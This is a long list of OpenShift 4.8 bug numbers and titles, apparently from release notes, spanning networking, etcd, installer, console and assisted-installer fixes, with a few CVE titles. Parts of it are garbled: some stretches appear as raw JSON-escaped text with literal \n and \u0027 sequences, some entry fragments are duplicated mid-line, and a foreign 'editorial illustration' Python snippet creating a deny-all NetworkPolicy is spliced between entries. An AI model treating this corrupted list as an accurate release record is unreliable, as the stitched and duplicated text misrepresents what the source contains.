1957584 - Routes are not getting created when using hostname without FQDN standard
1957597 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone
1957645 - Event "Updated PrometheusRule.monitoring.coreos.com/v1 because it changed" is frequently looped with weird empty {} changes
1957708 - e2e-metal-ipi and related jobs fail to bootstrap due to multiple VIPs
1957726 - Pod stuck in ContainerCreating - Failed to start transient scope unit: Connection timed out
1957748 - Ptp operator pod should have CPU and memory requests set but not limits
1957756 - Device Replacement UI, The status of the disk is "replacement ready" before I clicked on "start replacement"
1957772 - ptp daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent
1957775 - CVO creating cloud-controller-manager too early causing upgrade failures
1957809 - [OSP] Install with invalid platform.openstack.machinesSubnet results in runtime error
1957822 - Update apiserver tlsSecurityProfile description to include Custom profile
1957832 - CMO end-to-end tests work only on AWS
1957856 - 'resource name may not be empty' is shown in CI testing
1957869 - baremetal IPI power_interface for irmc is inconsistent
1957879 - cloud-controller-manager ClusterOperator manifest does not declare relatedObjects
1957889 - Incomprehensible documentation of the GatherClusterOperatorPodsAndEvents gatherer
1957893 - ClusterDeployment / Agent conditions show "ClusterAlreadyInstalling" during each spoke install
1957895 - Cypress helper projectDropdown.shouldContain is not an assertion
1957908 - Many e2e failed requests caused by kube-storage-version-migrator-operator's version reads
1957926 - "Add Capacity" should allow adding n*3 (or n*4) local devices at once
1957951 - [aws] destroy can get blocked on instances stuck in shutting-down state
1957967 - Possible test flake in listPage Cypress view
1957972 - Leftover templates from mdns
1957976 - Ironic execute_deploy_steps command to ramdisk times out, resulting in a failed deployment in 4.7
1957982 - Deployment Actions clickable for view-only projects
1957991 - ClusterOperatorDegraded can fire during installation
1958015 - "config-reloader-cpu" and "config-reloader-memory" flags have been deprecated for prometheus-operator
1958080 - Missing i18n for login, error and selectprovider pages
1958094 - Audit log files are corrupted sometimes
1958097 - don't show "old, insecure token format" if the token does not actually exist
1958114 - Ignore staged vendor files in pre-commit script
1958126 - [OVN] Egressip doesn't take effect
1958158 - OAuth proxy container for AlertManager and Thanos is flooding the logs
1958216 - ocp libvirt: dnsmasq options in install config should allow duplicate option names
1958245 - cluster-etcd-operator: static pod revision is not visible from etcd logs
1958285 - Deployment considered unhealthy despite being available and at latest generation
1958296 - OLM must explicitly alert on deprecated APIs in use
1958329 - pick 97428: add more context to log after a request times out
1958367 - Build metrics do not aggregate totals by build strategy
1958391 - Update MCO KubeletConfig to mixin the API Server TLS Security Profile Singleton
1958405 - etcd: current health checks and reporting are not adequate to ensure availability
1958406 - Twistlock flags mode of /var/run/crio/crio.sock
1958420 - openshift-install 4.7.10 fails with segmentation error
1958424 - aws: support more auth options in manual mode
1958439 - Install/Upgrade button on Install/Upgrade Helm Chart page does not work with Form View
1958492 - CCO: pod-identity-webhook still accesses APIRemovedInNextReleaseInUse
1958643 - All pod creation stuck due to SR-IOV webhook timeout
1958679 - Compression on pool can't be disabled via UI
1958753 - VMI nic tab is not loadable
1958759 - Pulling Insights report is missing retry logic
1958811 - VM creation fails on API version mismatch
1958812 - Cluster upgrade halts as machine-config-daemon fails to parse `rpm-ostree status` during cluster upgrades
1958861 - [CCO] pod-identity-webhook certificate request failed
1958868 - ssh copy is missing when vm is running
1958884 - Confusing error message when volume AZ not found
1958913 - "Replacing an unhealthy etcd member whose node is not ready" procedure results in new etcd pod in CrashLoopBackOff
1958930 - network config in machine configs prevents addition of new nodes with static networking via kargs
1958958 - [SCALE] segfault with ovnkube adding to address set
1958972 - [SCALE] deadlock in ovn-kube when scaling up to 300 nodes
1959041 - LSO Cluster UI, "Troubleshoot" link does not exist after scale down osd pod
1959058 - ovn-kubernetes has lock contention on the LSP cache
1959158 - packageserver clusteroperator Available condition set to false on any Deployment spec change
1959177 - Descheduler dev manifests are missing permissions
1959190 - Set LABEL io.openshift.release.operator=true for driver-toolkit image addition to payload
1959194 - Ingress controller should use minReadySeconds because otherwise it is disrupted during deployment updates
1959278 - Should remove prometheus servicemonitor from openshift-user-workload-monitoring
1959294 - openshift-operator-lifecycle-manager:olm-operator-serviceaccount should not rely on external networking for health check
1959327 - Degraded nodes on upgrade - Cleaning bootversions: Read-only file system
1959406 - Difficult to debug performance on ovn-k without pprof enabled
1959471 - Kube sysctl conformance tests are disabled, meaning we can't submit conformance results
1959479 - machines don't support dual-stack loadbalancers on Azure
1959513 - Cluster-kube-apiserver does not use library-go for audit pkg
1959519 - Operand details page only renders one status donut no matter how many 'podStatuses' descriptors are used
1959550 - Overly generic CSS rules for dd and dt elements break styling elsewhere in console
1959564 - Test verify /run filesystem contents failing
1959648 - oc adm top --help indicates that oc adm top can display storage usage while it cannot
1959650 - Gather SDI-related MachineConfigs
1959658 - showing a lot of "constructing many client instances from the same exec auth config"
1959696 - Deprecate 'ConsoleConfigRoute' struct in console-operator config
1959699 - [RFE] Collect LSO pod log and daemonset log managed by LSO
1959703 - Bootstrap gather gets into an infinite loop on bootstrap-in-place mode
1959711 - Egressnetworkpolicy doesn't work when configuring the EgressIP
1959786 - [dualstack] EgressIP doesn't work on dualstack cluster for IPv6
1959916 - Console does not work well against a proxy in front of openshift clusters
1959920 - UEFISecureBoot set not on the right master node
1959981 - [OCPonRHV] - Affinity Group should not be created by default if we define empty affinityGroupsNames: []
1960035 - iptables is missing from ose-keepalived-ipfailover image
1960059 - Remove "Grafana UI" link from Console Monitoring > Dashboards page
1960089 - ImageStreams list page, detail page and breadcrumb are not following CamelCase conventions
1960129 - [e2e][automation] add smoke tests about VM pages and actions
1960134 - some origin images are not public
1960171 - Enable SNO checks for image-registry
1960176 - CCO should recreate a user for the component when it was removed from the cloud providers
1960205 - The kubelet log flooded with reconcileState message once CPU manager enabled
1960255 - fixed obfuscation permissions
1960257 - breaking changes in pr template
1960284 - ExternalTrafficPolicy Local does not preserve connections correctly on shutdown, policy Cluster has significant performance cost
1960323 - Address issues raised by coverity security scan
1960324 - manifests: extra "spec.version" in console quickstarts makes CVO hotloop
1960330 - manifests: invalid selector in ServiceMonitor makes CVO hotloop
1960334 - manifests: invalid selector in ServiceMonitor makes CVO hotloop
1960337 - manifests: invalid selector in ServiceMonitor makes CVO hotloop
1960339 - manifests: unset "preemptionPolicy" makes CVO hotloop
1960531 - Items under 'Current Bandwidth' for Dashboard 'Kubernetes / Networking / Pod' keep getting added on every access
1960534 - Some graphs of console dashboards have no legend and tooltips are difficult to understand compared with grafana
1960546 - Add virt_platform metric to the collected metrics
1960554 - Remove rbacv1beta1 handling code
1960612 - Node disk info in overview/details does not account for second drive where /var is located
1960619 - Image registry integration tests use old-style OAuth tokens
1960683 - GlobalConfigPage is constantly requesting resources
1960711 - Enabling IPsec runtime causing incorrect MTU on Pod interfaces
1960716 - Missing details for debugging
1960732 - Outdated manifests directory in CSI driver operator repositories
1960757 - [OVN] hostnetwork pod can access MCS port 22623 or 22624 on master
1960758 - oc debug / oc adm must-gather do not require openshift/tools and openshift/must-gather to be "the newest"
1960767 - /metrics endpoint of the Grafana UI is accessible without authentication
1960780 - CI: failed to create PDB "service-test" the server could not find the requested resource
1961064 - Documentation link to network policies is outdated
1961067 - Improve log gathering logic
1961081 - policy/v1beta1 PodDisruptionBudget is deprecated in v1.21+, unavailable in v1.25+; use policy/v1 PodDisruptionBudget in CMO logs
1961091 - Gather MachineHealthCheck definitions
1961120 - CSI driver operators fail when upgrading a cluster
1961173 - recreate existing static pod manifests instead of updating
1961201 - [sig-network-edge] DNS should answer A and AAAA queries for a dual-stack service is constantly failing
1961314 - Race condition in operator-registry pull retry unit tests
1961320 - CatalogSource does not emit any metrics to indicate if it's ready or not
1961336 - Devfile sample for BuildConfig is not defined
1961356 - Update single quotes to double quotes in string
1961363 - Minor string update for "No Storage classes found in cluster, adding source is disabled."
1961393 - DetailsPage does not work with group~version~kind
1961452 - Remove "Alertmanager UI" link from Console Monitoring > Alerting page
1961466 - Some dropdown placeholder text on route creation page is not translated
1961472 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true
1961506 - NodePorts do not work on RHEL 7.9 workers (was "4.7 -> 4.8 upgrade is stuck at Ingress operator Degraded with rhel 7.9 workers")
(was \"4.7 -\u003e 4.8 upgrade is stuck at Ingress operator Degraded with rhel 7.9 workers\")\n1961536 - clusterdeployment without pull secret is crashing assisted service pod\n1961538 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop\n1961545 - Fixing Documentation Generation\n1961550 - HAproxy pod logs showing error \"another server named \u0027pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080\u0027 was already defined at line 326, please use distinct names\"\n1961554 - respect the shutdown-delay-duration from OpenShiftAPIServerConfig\n1961561 - The encryption controllers send lots of request to an API server\n1961582 - Build failure on s390x\n1961644 - NodeAuthenticator tests are failing in IPv6\n1961656 - driver-toolkit missing some release metadata\n1961675 - Kebab menu of taskrun contains Edit options which should not be present\n1961701 - Enhance gathering of events\n1961717 - Update runtime dependencies to Wallaby builds for bugfixes\n1961829 - Quick starts prereqs not shown when description is long\n1961852 - Excessive lock contention when adding many pods selected by the same NetworkPolicy\n1961878 - Add Sprint 199 translations\n1961897 - Remove history listener before console UI is unmounted\n1961925 - New ManagementCPUsOverride admission plugin blocks pod creation in clusters with no nodes\n1962062 - Monitoring dashboards should support default values of \"All\"\n1962074 - SNO:the pod get stuck in CreateContainerError and prompt \"failed to add conmon to systemd sandbox cgroup: dial unix /run/systemd/private: connect: resource temporarily unavailable\" after adding a performanceprofile\n1962095 - Replace gather-job image without FQDN\n1962153 - VolumeSnapshot routes are ambiguous, too generic\n1962172 - Single node CI e2e tests kubelet metrics endpoints intermittent downtime\n1962219 - NTO relies on unreliable leader-for-life implementation. \n1962256 - use RHEL8 as the vm-example\n1962261 - Monitoring components requesting more memory than they use\n1962274 - OCP on RHV installer fails to generate an install-config with only 2 hosts in RHV cluster\n1962347 - Cluster does not exist logs after successful installation\n1962392 - After upgrade from 4.5.16 to 4.6.17, customer\u0027s application is seeing re-transmits\n1962415 - duplicate zone information for in-tree PV after enabling migration\n1962429 - Cannot create windows vm because kubemacpool.io denied the request\n1962525 - [Migration] SDN migration stuck on MCO on RHV cluster\n1962569 - NetworkPolicy details page should also show Egress rules\n1962592 - Worker nodes restarting during OS installation\n1962602 - Cloud credential operator scrolls info \"unable to provide upcoming...\" on unsupported platform\n1962630 - NTO: Ship the current upstream TuneD\n1962687 - openshift-kube-storage-version-migrator pod failed due to Error: container has runAsNonRoot and image will run as root\n1962698 - Console-operator can not create resource console-public configmap in the openshift-config-managed namespace\n1962718 - CVE-2021-29622 prometheus: open redirect under the /new endpoint\n1962740 - Add documentation to Egress Router\n1962850 - [4.8] Bootimage bump tracker\n1962882 - Version pod does not set priorityClassName\n1962905 - Ramdisk ISO source defaulting to \"http\" breaks deployment on a good amount of BMCs\n1963068 - ironic container should not specify the entrypoint\n1963079 - KCM/KS: ability to enforce localhost communication with the API server. 
1963154 - Current BMAC reconcile flow skips Ironic's deprovision step
1963159 - Add Sprint 200 translations
1963204 - Update to 8.4 IPA images
1963205 - Installer is using old redirector
1963208 - Translation typos/inconsistencies for Sprint 200 files
1963209 - Some strings in public.json have errors
1963211 - Fix grammar issue in kubevirt-plugin.json string
1963213 - Memsource download script running into API error
1963219 - ImageStreamTags not internationalized
1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment
1963267 - Warning: Invalid DOM property `classname`. Did you mean `className`? console warnings in volumes table
1963502 - create template from is not descriptive
1963676 - in vm wizard when selecting an os template it looks like selecting the flavor too
1963833 - Cluster monitoring operator crashlooping on single node clusters due to segfault
1963848 - Use OS-shipped stalld vs. the NTO-shipped one.
1963866 - NTO: use the latest k8s 1.21.1 and openshift vendor dependencies
1963871 - cluster-etcd-operator: [build] upgrade to go 1.16
1963896 - The VM disks table does not show easy links to PVCs
1963912 - "[sig-network] DNS should provide DNS for {services, cluster, subdomain, hostname}" failures on vsphere
1963932 - Installation failures in bootstrap in OpenStack release jobs
1963964 - Characters are not escaped on config ini file causing Kuryr bootstrap to fail
1964059 - rebase openshift/sdn to kube 1.21.1
1964197 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration
1964203 - e2e-metal-ipi, e2e-metal-ipi-ovn-dualstack and e2e-metal-ipi-ovn-ipv6 are failing due to "Unknown provider baremetal"
1964243 - The `oc compliance fetch-raw` doesn't work for disconnected cluster
1964270 - Failed to install 'cluster-kube-descheduler-operator' with error: "clusterkubedescheduleroperator.4.8.0-202105211057.p0.assembly.stream\": must be no more than 63 characters"
1964319 - Network policy "deny all" interpreted as "allow all" in description page
1964334 - alertmanager/prometheus/thanos-querier /metrics endpoints are not secured
1964472 - Make project and namespace requirements more visible rather than giving me an error after submission
1964486 - Bulk adding of CIDR IPS to whitelist is not working
1964492 - Pick 102171: Implement support for watch initialization in P&F
1964625 - NETID duplicate check is only required in NetworkPolicy Mode
1964748 - Sync upstream 1.7.2 downstream
1964756 - PVC status is always in 'Bound' status when it is actually cloning
1964847 - Sanity check test suite missing from the repo
1964888 - openshift-apiserver imagestreamimports depend on >34s timeout support, WAS: transport: loopyWriter.run returning. connection error: desc = "transport is closing"
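Bug 1964319 above describes the console rendering a "deny all" NetworkPolicy as "allow all". As an editorial illustration only, here is a minimal sketch of the deny-all-ingress pattern at issue, assuming the kubernetes Python client; an empty podSelector with no ingress rules selects every pod in the namespace and permits no traffic, which is exactly the shape a description page must not invert:

    # Sketch: default deny-all-ingress NetworkPolicy via the kubernetes client.
    # Names and namespace are hypothetical.
    from kubernetes import client, config

    config.load_kube_config()
    deny_all = client.V1NetworkPolicy(
        metadata=client.V1ObjectMeta(name="default-deny-ingress"),
        spec=client.V1NetworkPolicySpec(
            pod_selector=client.V1LabelSelector(),  # empty selector = all pods
            policy_types=["Ingress"],               # no ingress rules = deny all ingress
        ),
    )
    client.NetworkingV1Api().create_namespaced_network_policy("default", deny_all)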
1964936 - error log for "oc adm catalog mirror" is not correct
1964979 - Add mapping from ACI to infraenv to handle creation order issues
1964997 - Helm Library charts are showing and can be installed from Catalog
1965024 - [DR] backup and restore should perform consistency checks on etcd snapshots
1965092 - [Assisted-4.7] [Staging][OLM] Operators deployments start before all workers finished installation
1965283 - 4.7->4.8 upgrades: cluster operators are not ready: openshift-controller-manager (Upgradeable=Unknown NoData: ), service-ca (Upgradeable=Unknown NoData:
1965330 - oc image extract fails due to security capabilities on files
1965334 - opm index add fails during image extraction
1965367 - Typo in etcd-metric-serving-ca resource name
1965370 - "Route" is not translated in Korean or Chinese
1965391 - When storage class is already present wizard does not jump to "Storage and nodes"
1965422 - runc is missing Provides oci-runtime in rpm spec
1965522 - [v2v] Multiple typos on VM Import screen
1965545 - Pod stuck in ContainerCreating: Unit ...slice already exists
1965909 - Replace "Enable Taint Nodes" by "Mark nodes as dedicated"
1965921 - [oVirt] High performance VMs shouldn't be created with Existing policy
1965929 - kube-apiserver should use cert auth when reaching out to the oauth-apiserver with a TokenReview request
1966077 - `hidden` descriptor is visible in the Operator instance details page
1966116 - DNS SRV request which worked in 4.7.9 stopped working in 4.7.11
1966126 - root_ca_cert_publisher_sync_duration_seconds metric can have an excessive cardinality
1966138 - (release-4.8) Update K8s & OpenShift API versions
1966156 - Issue with Internal Registry CA on the service pod
1966174 - No storage class is installed, OCS and CNV installations fail
1966268 - Workaround for Network Manager not supporting nmconnections priority
1966401 - Revamp Ceph Table in Install Wizard flow
1966410 - kube-controller-manager should not trigger APIRemovedInNextReleaseInUse alert
1966416 - (release-4.8) Do not exceed the data size limit
1966459 - 'policy/v1beta1 PodDisruptionBudget' and 'batch/v1beta1 CronJob' appear in image-registry-operator log
1966487 - IP addresses in Pods list table show node IP rather than pod IP
1966520 - Add button from ocs add capacity should not be enabled if there are no PVs
1966523 - (release-4.8) Gather MachineAutoScaler definitions
1966546 - [master] KubeAPI - keep day1 after cluster is successfully installed
1966561 - Workload partitioning annotation workaround needed for CSV annotation propagation bug
1966602 - don't require manually setting IPv6DualStack feature gate in 4.8
1966620 - The bundle.Dockerfile in the repo is obsolete
1966632 - [4.8.0] [assisted operator] Unable to re-register an SNO instance if deleting CRDs during install
1966654 - Alertmanager PDB is not created, but Prometheus UWM is
1966672 - Add Sprint 201 translations
1966675 - Admin console string updates
1966677 - Change comma to semicolon
1966683 - Translation bugs from Sprint 201 files
1966684 - Verify "Creating snapshot for claim <1>{pvcName}</1>" displays correctly
1966697 - Garbage collector logs every interval - move to debug level
1966717 - include full timestamps in the logs
1966759 - Enable downstream plugin for Operator SDK
1966795 - [tests] Release 4.7 broken due to the usage of wrong OCS version
1966813 - "Replacing an unhealthy etcd member whose node is not ready" procedure results in new etcd pod in CrashLoopBackOff
\"Replacing an unhealthy etcd member whose node is not ready\" procedure results in new etcd pod in CrashLoopBackOff\n1966862 - vsphere IPI - local dns prepender is not prepending nameserver 127.0.0.1\n1966892 - [master] [Assisted-4.8][SNO] SNO node cannot transition into \"Writing image to disk\" from \"Waiting for bootkub[e\"\n1966952 - [4.8.0] [Assisted-4.8][SNO][Dual Stack] DHCPv6 settings \"ipv6.dhcp-duid=ll\" missing from dual stack install\n1967104 - [4.8.0] InfraEnv ctrl: log the amount of NMstate Configs baked into the image\n1967126 - [4.8.0] [DOC] KubeAPI docs should clarify that the InfraEnv Spec pullSecretRef is currently ignored\n1967197 - 404 errors loading some i18n namespaces\n1967207 - Getting started card: console customization resources link shows other resources\n1967208 - Getting started card should use semver library for parsing the version instead of string manipulation\n1967234 - Console is continuously polling for ConsoleLink acm-link\n1967275 - Awkward wrapping in getting started dashboard card\n1967276 - Help menu tooltip overlays dropdown\n1967398 - authentication operator still uses previous deleted pod ip rather than the new created pod ip to do health check\n1967403 - (release-4.8) Increase workloads fingerprint gatherer pods limit\n1967423 - [master] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion\n1967444 - openshift-local-storage pods found with invalid priority class, should be openshift-user-critical or begin with system- while running e2e tests\n1967531 - the ccoctl tool should extend MaxItems when listRoles, the default value 100 is a little small\n1967578 - [4.8.0] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion\n1967591 - The ManagementCPUsOverride admission plugin should not mutate containers with the limit\n1967595 - Fixes the remaining lint issues\n1967614 - prometheus-k8s pods can\u0027t be scheduled due to volume node affinity conflict\n1967623 - [OCPonRHV] - ./openshift-install installation with install-config doesn\u0027t work if ovirt-config.yaml doesn\u0027t exist and user should fill the FQDN URL\n1967625 - Add OpenShift Dockerfile for cloud-provider-aws\n1967631 - [4.8.0] Cluster install failed due to timeout while \"Waiting for control plane\"\n1967633 - [4.8.0] [Assisted-4.8][SNO] SNO node cannot transition into \"Writing image to disk\" from \"Waiting for bootkube\"\n1967639 - Console whitescreens if user preferences fail to load\n1967662 - machine-api-operator should not use deprecated \"platform\" field in infrastructures.config.openshift.io\n1967667 - Add Sprint 202 Round 1 translations\n1967713 - Insights widget shows invalid link to the OCM\n1967717 - Insights Advisor widget is missing a description paragraph and contains deprecated naming\n1967745 - When setting DNS node placement by toleration to not tolerate master node, effect value should not allow string other than \"NoExecute\"\n1967803 - should update to 7.5.5 for grafana resources version label\n1967832 - Add more tests for periodic.go\n1967833 - Add tasks pool to tasks_processing\n1967842 - Production logs are spammed on \"OCS requirements validation status Insufficient hosts to deploy OCS. 
A minimum of 3 hosts is required to deploy OCS\"\n1967843 - Fix null reference to messagesToSearch in gather_logs.go\n1967902 - [4.8.0] Assisted installer chrony manifests missing index numberring\n1967933 - Network-Tools debug scripts not working as expected\n1967945 - [4.8.0] [assisted operator] Assisted Service Postgres crashes msg: \"mkdir: cannot create directory \u0027/var/lib/pgsql/data/userdata\u0027: Permission denied\"\n1968019 - drain timeout and pool degrading period is too short\n1968067 - [master] Agent validation not including reason for being insufficient\n1968168 - [4.8.0] KubeAPI - keep day1 after cluster is successfully installed\n1968175 - [4.8.0] Agent validation not including reason for being insufficient\n1968373 - [4.8.0] BMAC re-attaches installed node on ISO regeneration\n1968385 - [4.8.0] Infra env require pullSecretRef although it shouldn\u0027t be required\n1968435 - [4.8.0] Unclear message in case of missing clusterImageSet\n1968436 - Listeners timeout updated to remain using default value\n1968449 - [4.8.0] Wrong Install-config override documentation\n1968451 - [4.8.0] Garbage collector not cleaning up directories of removed clusters\n1968452 - [4.8.0] [doc] \"Mirror Registry Configuration\" doc section needs clarification of functionality and limitations\n1968454 - [4.8.0] backend events generated with wrong namespace for agent\n1968455 - [4.8.0] Assisted Service operator\u0027s controllers are starting before the base service is ready\n1968515 - oc should set user-agent when talking with registry\n1968531 - Sync upstream 1.8.0 downstream\n1968558 - [sig-cli] oc adm storage-admin [Suite:openshift/conformance/parallel] doesn\u0027t clean up properly\n1968567 - [OVN] Egress router pod not running and openshift.io/scc is restricted\n1968625 - Pods using sr-iov interfaces failign to start for Failed to create pod sandbox\n1968700 - catalog-operator crashes when status.initContainerStatuses[].state.waiting is nil\n1968701 - Bare metal IPI installation is failed due to worker inspection failure\n1968754 - CI: e2e-metal-ipi-upgrade failing on KubeletHasDiskPressure, which triggers machine-config RequiredPoolsFailed\n1969212 - [FJ OCP4.8 Bug - PUBLIC VERSION]: Masters repeat reboot every few minutes during workers provisioning\n1969284 - Console Query Browser: Can\u0027t reset zoom to fixed time range after dragging to zoom\n1969315 - [4.8.0] BMAC doesn\u0027t check if ISO Url changed before queuing BMH for reconcile\n1969352 - [4.8.0] Creating BareMetalHost without the \"inspect.metal3.io\" does not automatically add it\n1969363 - [4.8.0] Infra env should show the time that ISO was generated. 
\n1969367 - [4.8.0] BMAC should wait for an ISO to exist for 1 minute before using it\n1969386 - Filesystem\u0027s Utilization doesn\u0027t show in VM overview tab\n1969397 - OVN bug causing subports to stay DOWN fails installations\n1969470 - [4.8.0] Misleading error in case of install-config override bad input\n1969487 - [FJ OCP4.8 Bug]: Avoid always do delete_configuration clean step\n1969525 - Replace golint with revive\n1969535 - Topology edit icon does not link correctly when branch name contains slash\n1969538 - Install a VolumeSnapshotClass by default on CSI Drivers that support it\n1969551 - [4.8.0] Assisted service times out on GetNextSteps due to `oc adm release info` taking too long\n1969561 - Test \"an end user can use OLM can subscribe to the operator\" generates deprecation alert\n1969578 - installer: accesses v1beta1 RBAC APIs and causes APIRemovedInNextReleaseInUse to fire\n1969599 - images without registry are being prefixed with registry.hub.docker.com instead of docker.io\n1969601 - manifest for networks.config.openshift.io CRD uses deprecated apiextensions.k8s.io/v1beta1\n1969626 - Portfoward stream cleanup can cause kubelet to panic\n1969631 - EncryptionPruneControllerDegraded: etcdserver: request timed out\n1969681 - MCO: maxUnavailable of ds/machine-config-daemon does not get updated due to missing resourcemerge check\n1969712 - [4.8.0] Assisted service reports a malformed iso when we fail to download the base iso\n1969752 - [4.8.0] [assisted operator] Installed Clusters are missing DNS setups\n1969773 - [4.8.0] Empty cluster name on handleEnsureISOErrors log after applying InfraEnv.yaml\n1969784 - WebTerminal widget should send resize events\n1969832 - Applying a profile with multiple inheritance where parents include a common ancestor fails\n1969891 - Fix rotated pipelinerun status icon issue in safari\n1969900 - Test files should not use deprecated APIs that will trigger APIRemovedInNextReleaseInUse\n1969903 - Provisioning a large number of hosts results in an unexpected delay in hosts becoming available\n1969951 - Cluster local doesn\u0027t work for knative services created from dev console\n1969969 - ironic-rhcos-downloader container uses and old base image\n1970062 - ccoctl does not work with STS authentication\n1970068 - ovnkube-master logs \"Failed to find node ips for gateway\" error\n1970126 - [4.8.0] Disable \"metrics-events\" when deploying using the operator\n1970150 - master pool is still upgrading when machine config reports level / restarts on osimageurl change\n1970262 - [4.8.0] Remove Agent CRD Status fields not needed\n1970265 - [4.8.0] Add State and StateInfo to DebugInfo in ACI and Agent CRDs\n1970269 - [4.8.0] missing role in agent CRD\n1970271 - [4.8.0] Add ProgressInfo to Agent and AgentClusterInstalll CRDs\n1970381 - Monitoring dashboards: Custom time range inputs should retain their values\n1970395 - [4.8.0] SNO with AI/operator - kubeconfig secret is not created until the spoke is deployed\n1970401 - [4.8.0] AgentLabelSelector is required yet not supported\n1970415 - SR-IOV Docs needs documentation for disabling port security on a network\n1970470 - Add pipeline annotation to Secrets which are created for a private repo\n1970494 - [4.8.0] Missing value-filling of log line in assisted-service operator pod\n1970624 - 4.7-\u003e4.8 updates: AggregatedAPIDown for v1beta1.metrics.k8s.io\n1970828 - \"500 Internal Error\" for all openshift-monitoring routes\n1970975 - 4.7 -\u003e 4.8 upgrades on AWS take longer than expected\n1971068 - Removing 
invalid AWS instances from the CF templates\n1971080 - 4.7-\u003e4.8 CI: KubePodNotReady due to MCD\u0027s 5m sleep between drain attempts\n1971188 - Web Console does not show OpenShift Virtualization Menu with VirtualMachine CRDs of version v1alpha3 !\n1971293 - [4.8.0] Deleting agent from one namespace causes all agents with the same name to be deleted from all namespaces\n1971308 - [4.8.0] AI KubeAPI AgentClusterInstall confusing \"Validated\" condition about VIP not matching machine network\n1971529 - [Dummy bug for robot] 4.7.14 upgrade to 4.8 and then downgrade back to 4.7.14 doesn\u0027t work - clusteroperator/kube-apiserver is not upgradeable\n1971589 - [4.8.0] Telemetry-client won\u0027t report metrics in case the cluster was installed using the assisted operator\n1971630 - [4.8.0] ACM/ZTP with Wan emulation fails to start the agent service\n1971632 - [4.8.0] ACM/ZTP with Wan emulation, several clusters fail to step past discovery\n1971654 - [4.8.0] InfraEnv controller should always requeue for backend response HTTP StatusConflict (code 409)\n1971739 - Keep /boot RW when kdump is enabled\n1972085 - [4.8.0] Updating configmap within AgentServiceConfig is not logged properly\n1972128 - ironic-static-ip-manager container still uses 4.7 base image\n1972140 - [4.8.0] ACM/ZTP with Wan emulation, SNO cluster installs do not show as installed although they are\n1972167 - Several operators degraded because Failed to create pod sandbox when installing an sts cluster\n1972213 - Openshift Installer| UEFI mode | BM hosts have BIOS halted\n1972262 - [4.8.0] \"baremetalhost.metal3.io/detached\" uses boolean value where string is expected\n1972426 - Adopt failure can trigger deprovisioning\n1972436 - [4.8.0] [DOCS] AgentServiceConfig examples in operator.md doc should each contain databaseStorage + filesystemStorage\n1972526 - [4.8.0] clusterDeployments controller should send an event to InfraEnv for backend cluster registration\n1972530 - [4.8.0] no indication for missing debugInfo in AgentClusterInstall\n1972565 - performance issues due to lost node, pods taking too long to relaunch\n1972662 - DPDK KNI modules need some additional tools\n1972676 - Requirements for authenticating kernel modules with X.509\n1972687 - Using bound SA tokens causes causes failures to /apis/authorization.openshift.io/v1/clusterrolebindings\n1972690 - [4.8.0] infra-env condition message isn\u0027t informative in case of missing pull secret\n1972702 - [4.8.0] Domain dummy.com (not belonging to Red Hat) is being used in a default configuration\n1972768 - kube-apiserver setup fail while installing SNO due to port being used\n1972864 - New `local-with-fallback` service annotation does not preserve source IP\n1973018 - Ironic rhcos downloader breaks image cache in upgrade process from 4.7 to 4.8\n1973117 - No storage class is installed, OCS and CNV installations fail\n1973233 - remove kubevirt images and references\n1973237 - RHCOS-shipped stalld systemd units do not use SCHED_FIFO to run stalld. 
\n1973428 - Placeholder bug for OCP 4.8.0 image release\n1973667 - [4.8] NetworkPolicy tests were mistakenly marked skipped\n1973672 - fix ovn-kubernetes NetworkPolicy 4.7-\u003e4.8 upgrade issue\n1973995 - [Feature:IPv6DualStack] tests are failing in dualstack\n1974414 - Uninstalling kube-descheduler clusterkubedescheduleroperator.4.6.0-202106010807.p0.git.5db84c5 removes some clusterrolebindings\n1974447 - Requirements for nvidia GPU driver container for driver toolkit\n1974677 - [4.8.0] KubeAPI CVO progress is not available on CR/conditions only in events. \n1974718 - Tuned net plugin fails to handle net devices with n/a value for a channel\n1974743 - [4.8.0] All resources not being cleaned up after clusterdeployment deletion\n1974746 - [4.8.0] File system usage not being logged appropriately\n1974757 - [4.8.0] Assisted-service deployed on an IPv6 cluster installed with proxy: agentclusterinstall shows error pulling an image from quay. \n1974773 - Using bound SA tokens causes fail to query cluster resource especially in a sts cluster\n1974839 - CVE-2021-29059 nodejs-is-svg: Regular expression denial of service if the application is provided and checks a crafted invalid SVG string\n1974850 - [4.8] coreos-installer failing Execshield\n1974931 - [4.8.0] Assisted Service Operator should be Infrastructure Operator for Red Hat OpenShift\n1974978 - 4.8.0.rc0 upgrade hung, stuck on DNS clusteroperator progressing\n1975155 - Kubernetes service IP cannot be accessed for rhel worker\n1975227 - [4.8.0] KubeAPI Move conditions consts to CRD types\n1975360 - [4.8.0] [master] timeout on kubeAPI subsystem test: SNO full install and validate MetaData\n1975404 - [4.8.0] Confusing behavior when multi-node spoke workers present when only controlPlaneAgents specified\n1975432 - Alert InstallPlanStepAppliedWithWarnings does not resolve\n1975527 - VMware UPI is configuring static IPs via ignition rather than afterburn\n1975672 - [4.8.0] Production logs are spammed on \"Found unpreparing host: id 08f22447-2cf1-a107-eedf-12c7421f7380 status insufficient\"\n1975789 - worker nodes rebooted when we simulate a case where the api-server is down\n1975938 - gcp-realtime: e2e test failing [sig-storage] Multi-AZ Cluster Volumes should only be allowed to provision PDs in zones where nodes exist [Suite:openshift/conformance/parallel] [Suite:k8s]\n1975964 - 4.7 nightly upgrade to 4.8 and then downgrade back to 4.7 nightly doesn\u0027t work -  ingresscontroller \"default\" is degraded\n1976079 - [4.8.0] Openshift Installer| UEFI mode | BM hosts have BIOS halted\n1976263 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel]\n1976376 - disable jenkins client plugin test whose Jenkinsfile references master branch openshift/origin artifacts\n1976590 - [Tracker] [SNO][assisted-operator][nmstate] Bond Interface is down when booting from the discovery ISO\n1977233 - [4.8] Unable to authenticate against IDP after upgrade to 4.8-rc.1\n1977351 - CVO pod skipped by workload partitioning with incorrect error stating cluster is not SNO\n1977352 - [4.8.0] [SNO] No DNS 